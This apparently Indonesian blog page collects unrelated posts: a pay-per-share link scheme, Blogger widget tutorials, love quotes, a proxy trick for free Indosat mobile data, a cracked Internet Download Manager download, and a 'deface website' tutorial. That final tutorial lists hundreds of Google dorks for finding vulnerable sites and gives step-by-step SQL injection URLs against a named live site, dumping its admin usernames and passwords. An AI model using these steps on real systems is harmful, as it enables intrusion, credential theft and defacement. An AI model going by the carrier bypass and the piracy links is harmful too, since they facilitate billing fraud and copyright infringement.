Cara dapat uang/duit dari internet cuma dengan "SHARE''

Halo smua , hari ini saya akan share bagaimana cara mendapat uang dari internet hanya dengan share di facebook/twitter atau media sosial lainnya dan mendapat uang per kliknya :) minat bukan???

Silahkan kunjungi http://bit.ly/1ekL0Ci
Setelah buka register lalu share deh di media sosial per klik biasanya akan mendapat Rp250.

Terima kasih semoga bermanfaat buat agan" :)

Cara Memasang Jam Garuda pada blog

 

• Buka Blogger.com , lalu login


• Pilih Design > Add gadget > HTML/Javascript


• Copy Kode Dibawah Ini Dan pastekan di Html/JAvascript 

   <p align="center"><embed src="http://www.widgipedia.com/widgets/orido/Jam-Garuda-Indonesia-4639-8192_134217728.widget?__install_id=1248336094072&__view=expanded" width="200" height="200" flashvars="&col1=d89b09&col2=7cc034&dayAdd=0&cal=true&gig_lt=1248336103578&gig_pt=1248336182359&gig_g=1&gig_n=blogger" swliveconnect="true" quality="best" loop="false" menu="false" wmode="transparent" allowscriptaccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" > < /embed></p

• Setelah ituh simpan


• Dan selesai :D 

Sekian tutorialnya :D 

Bagi yang mau request silahkan coment aja nanti akan saya usahakan bantu :D

Kumpulan Kata Kata Bijak Tentang Cinta Terbaru

ata kata bijak terbaru tentang cinta memang tidak sulit untuk ditemukan, bahkan bagi beberapa orang mungkin bisa dnegan membuat kata bijak cinta tersebut sendiri. Apa fungsinya kata bijak? Kata kata bijak perlu akan sangat bermanfaat bagi setiap kehidupan, untuk memberikan motivasi dan memberikan inspirasi, begitupun juga dalam hubungan percintaan, kata bijak cinta akan sangat baik bagi mereka yang tengah dirundung masalah ataupun tengah mengalami kebahagiaan dalam percintaan.

Hari ini kami pun berkesempatan untuk membahas tentang kumpulan kata bijak yang berkaitan dengan cinta. Kumpulan kata bijak cinta ini pasti bisa menambah motivasi dan inspirasi dalam kehidupan khususnya dalam membina hubungan percintaan atau memberikan motivasi agar lebih baik lagi dalam mencari cinta sejati. Tanpa perlu panjang lebar lebih baik langsung kita simak kumpulan kata kata bijak tentang cinta di bawah ini.

“Cinta adalah suatu anugerah yang diberikan oleh Tuhan kepada setiap manusia, jagalah cinta sebelum cinta itu pergi”

“Cinta yang tulus akan selalu memiliki alasan untuk mempertahankan meskipun sedang diuji dalam cobaan yang bisa saja memisahkan”

“Jangan pernah memandang rendah diri sendiri. Untuk dunia mungkin kamu hanya seseorang, tapi bagi seseorang mungkin kamu bisa menjadi dunianya”

“Biarkanlah orang yang kamu cintai mengetahui apa yang kamu rasakan padanya. Memendam cinta hanya akan menyakiti diri sendiri”

“Cinta akan terasa sempurna jika saling melengkapi, dan cinta akan terasa indah ketika bisa saling mengasihi”

“Mencintai bukanlah memberikan yang terbaik dalam kelebihan, namun memberikan yang terbaik dalam kekurangan”

“Hanya cinta yang bisa membuatmu bahagia, meskipun terkadang memberikan rasa luka. Tapi cinta akan terasa begitu istimewa ketika kamu memberikannya kepada seseorang yang setia”

“Seseorang yang tulus mencintaimu bukanlah seseorang yang membuatmu tertawa ketika kamu bersedih, melainkan seseorang yang melihatmu tertawa ketika kamu tengah merasakan kesedihan”

“Terluka dan memafkan merupakan bagian dari cinta. Itu karena cinta yang tulus akan ada kata maaf untuknya”

“Cinta memberikan alasan untuk tersenyum dan memberikan waktu yang indah untuk tertawa. Tapi terkadang cinta juga memberikan kenangan yang tak akan pernah dilupakan”

“Terkadang kamu harus mengikhlaskan. Bukan karena tak sayang, tapi karena ada sesuatu yang memang tidak bisa dipaksakan”

“Jika kamu bertemu dengan seseorang yang senyumnya dapat membuatmu tersenyum, maka kamu telah menemukan orang yang tepat bagi hidupmu”

“Bahagia adalah ketika bisa bersama, saling mencinta tanpa mempermasalahkan kekurangan yang kita miliki”

“Jika kamu berubah hanya karena ingin seseorang menyukaimu, maka kamu dicintai seseorang yang memang bukan dirimu”

“Jika memang cinta, buktikan saja. Jika memang tidak cinta, lebih baik jangan memberikan sebuah harpan yang bisa melukainya”

“Dalam cinta kamu tidak perlu mencari orang yang tepat, kamu hanya perlu menjadi orang yang tepat bagi dia yang saat ini kamu cinta”

“Cinta yang kamu terimka akan sebanding dengan cinta yang kami berikan. Cintai lebih jika ingin dicintai lebih”

“Tidak ada manusia yang sempurna, namun seseorang akan terlihat sempurna jika kamu mencintainya dengan rasa yang tulus”

“Salah satu yang penting dalam kehidupan adalah memberikan cinta yang tulus kepada orang lain”

“Cinta tidak akan menuntut kesempurnaan, cinta akan memahami, menerima dan rela untuk berkorban. Karena cinta seharusnya membuatmu bahagia bukan terluka”

“Cinta sejati tidak datang begitu saja. Namun akan melalui proses sedih dan tertawa bersama, juga nestapa atau mungkin bahkan derita”

“Kesetiaan berarti ketulusan untuk menyimpan satu nama dihati, lalu berjanji untuk tidak mengkhianati”

“Ketika jatuh cinta jangan saling berjanji untuk tidak saling menyakiti, tapi berjanjilah untuk tetap bertahan meskipun salah satu tersakiti”

“Dalam cinta, berhati-hatilah dalam berkata. Karena meskipun amarah akan menguasai logika, hatimu tak akan pernah berhenti untuk merindukannya”

“Cinta itu tidak buta karena ia mampu membuat seseorang untuk melihat hal-hal yang tak mampu dilihat orang lain”

Kumpulan kata bijak terbaru tentang cinta diatas tentu akan sangat bisa memotivasi kita dalam menjalani kehidupan percintaan. Apalagi bagi seseoorang yang tengah mencari siapa cinta sejatinya ataupun saat ini tengah mengalami kebimbangan dalam percintaan.

TRIK GRATIS INDOSAT LEWAT UC WEB 9.3

Kaliini saya akan menshare trik internet gratis Indosat silahkan diliat :D
Harus mempunyai UC WEB 9.3 ya

set hp :
apn : indosatgprs
proxy : 10.19.19.19
port : 80
set uc web
# frontquery : indosat.muslimlife.com.ngup.tk/h.v/00/http/
# frontquery : mmsc.indosat.com.proxydanang.tk/d.a/00/http/
# frontquery : http://mmsc.indosat.com.monaqus.com/h.v/en/00/http/

silahkan dipilih satu saja proxy nya ya.untuk yang lainnya biarkan standar saja jangan diutak atik.bagi yang belum punya uc web 9.3 nya silahkan download.

---

jar dan zip

untuk melewati link adfoc copy teks area diatas. Jika nanti masuk ke situs adfoc masukkan ke kolom url tanpa http/www. Jika nanti ada tulisan skip klik saja tulisan skip itu.jika nanti terlempar ke suatu situs mundur saja lagi lalu klik lagi skip,maka insya Allah bisa download.

---

trik gratis indosat lewat uc web 9.3 ini tentu saja bisa buat download maupun upload selain bisa buat browsing. Jika tidak suka dengan uc web dan lebih suka pakai opera mini silahkan lihat trik internet gratis indosat pakai opera mini disiniya.

cukup sekian saja trik gratis indosat lewat uc web 9.3.gunakan pulsa minim untuk menghindari kalo triknya mati tanpa setahu kita supaya tidak kena palak operator.semoga trik ini bisa digunakan dengan baik dan juga dengan bijak. Jangan gunakan buat download maupun upload film porno ya,ingat dosa lho. Sampai jumpa pada trik internet gratis lainnya.


Diedit Oleh Jefry Ariyanto Salim
Sumber http://www.sarilah.biz/trik-gratis-indosat-lewat-uc-web-9-3.xhtml

Download Internet Download Manager 6.18 Final Full Patch

Silahkan Bagi agan" yg mau download IDM Link berikut ini

• Internet Download Manager 6.18 | Size : 5,3 Mb

• Patch Only | Size : 326 Kb 

Silahkan disedot agan" :D

Cara memasang banyak lagu di blog

Memasang Widget Musik Player untuk sebuah blog memiliki kekurangan dan kelebihan tersendiri. 

Tergantung dari si pengunjung dan koneksi yang dimilikinya.

Untuk anda yang tetap ingin memasang lagu diblognya, berikut saya sediakan satu tutorial mudah dan singkat, silangkan disimak.
Pertama kunjungi situs scmplayer.net, kemudian pada tab Choose Skin, silahkan pilih tampilan skin widget yang nantinya akan ditampilkan pada blog anda.

Lalu klik pada tab Edit Playlist, disini ada dua pilihan yaitu dengan memasukan url lagu yang di pasang manual(Manual Playlist). Atau dari playlist akun youtube(RSS Podcast) anda. gunakan saja pilihan pertama "Manual Playlist".

Contoh Yang Saya Lakukan

Perhatikan pada gambar yang saya lingkari merah, disitu terterah contoh untuk memasukan lagu yang anda inginkan, silahkan anda cari situs yang menyediakan lagu atau bisa anda upload sendiri ataupun mencari diyoutube.com video yang nantinya sebagai url lagu.(bukan menampilkan video, hanya suara dari video)

Kemudian klik pada tab Configure Settings untuk mengatur lagu yang sudah kita pilih tadi, atur sesuai keinginan anda. Atau seperti pengaturan saya pada gambar dibawah ini

Setelah itu klik tombol Done, lalu copy script yang diberikan.

Langkah terakhir, masuk ke akun blogger anda pilih tata letak. Kemudian klik tambah gadget pilih gadget HTML/Javascript. Lalu paste kan script tadi. klik Simpan.

sekarang blog anda sudah terpasang lagu, setiap pengunjung yang datang akan disambut dengan lagu yang anda pasang  pastikan pada tab Edit Playlist, anda memasukan url yang benar. Selamat mencoba....

Motivasi Dan Insirasi - Bukanlah Kesulitan Yang Membuat Kita TAKUT, Tapi Ketakutanlah Yang Membuat Kita SULIT

Bukanlah Kesulitan Yang Membuat Kita TAKUT, Tapi Ketakutanlah Yang Membuat Kita SULIT.

Karena Itu Jangan Pernah Mencoba Untuk Menyerah Dan Jangan Pernah Menyerah Untuk Mencoba.

Maka Janganlah Katakan Pada ALLAH "Aku Punya Masalah",

Namun Katakanlah Pada Masalah "Aku Punya ALLAH Yang Maha SegalaNYA".

Cara deface website

hari ini saya akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL

apa itu SQL INJECTION .? (tolong jangan disalahgunakan ini hanya untuk pembelajaran aj )

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url

Contoh : http://situsq.com/berita.php?id=14’ http://situsq.com/berita.php?id=’14

Apabila terlihat pesan error seperti ini :

You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…

dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR, 

Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:

https://addons.mozilla.org/id/firefox/addon/hackbar/

Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()

WOW banyak amat -_-, memang banyak sob soalnya dork buat cari target itu ngak cukup 1 dan juga ngak sekali cari ketemu  ,

Sebenarnya dork itu banyak tapi kemnculan dork-dork baru tergantung kreatifitas individu masing-masing
oke langsung saja Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut

contoh :

http://www.zenfocus.com/partners.php?id=2

nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

teradapat VULN

Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali

Contoh: http://www.zenfocus.com/partners.php?id=2 order by 1–  no error http://www.zenfocus.com/partners.php?id=2 order by 2–  no error http://www.zenfocus.com/partners.php?id=2 order by 3–  no error http://www.zenfocus.com/partners.php?id=2 order by 4–  no error http://www.zenfocus.com/partners.php?id=2 order by 5–  no error http://www.zenfocus.com/partners.php?id=2 order by 6–  no error http://www.zenfocus.com/partners.php?id=2 order by 7–  error

eror table ke 7

Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka

Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–

Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi

Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–

Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda –

Contoh: http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–

Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “group_concat(table_name) ” dengan perintah “ column_name ” menjadi “group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “information_schema.tables “ dengan perintah “ .columns ” menjadi “information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”

dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBARyaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –>  MySQL –> MySQL CHAR()

setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok sehingga perintah kita menjadi

http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Setelah itu tekan Execute
Dan hasilnya

Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3aadalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi

http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—

tekan Execute

dan hasilnya

Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat sobat 

PESAN DARI ADMIN

INGAT berjuta-juta WEBSITE yang anda DEFACE tidak akan membuat anda menjadi HEBAT

Thanks /.

sumber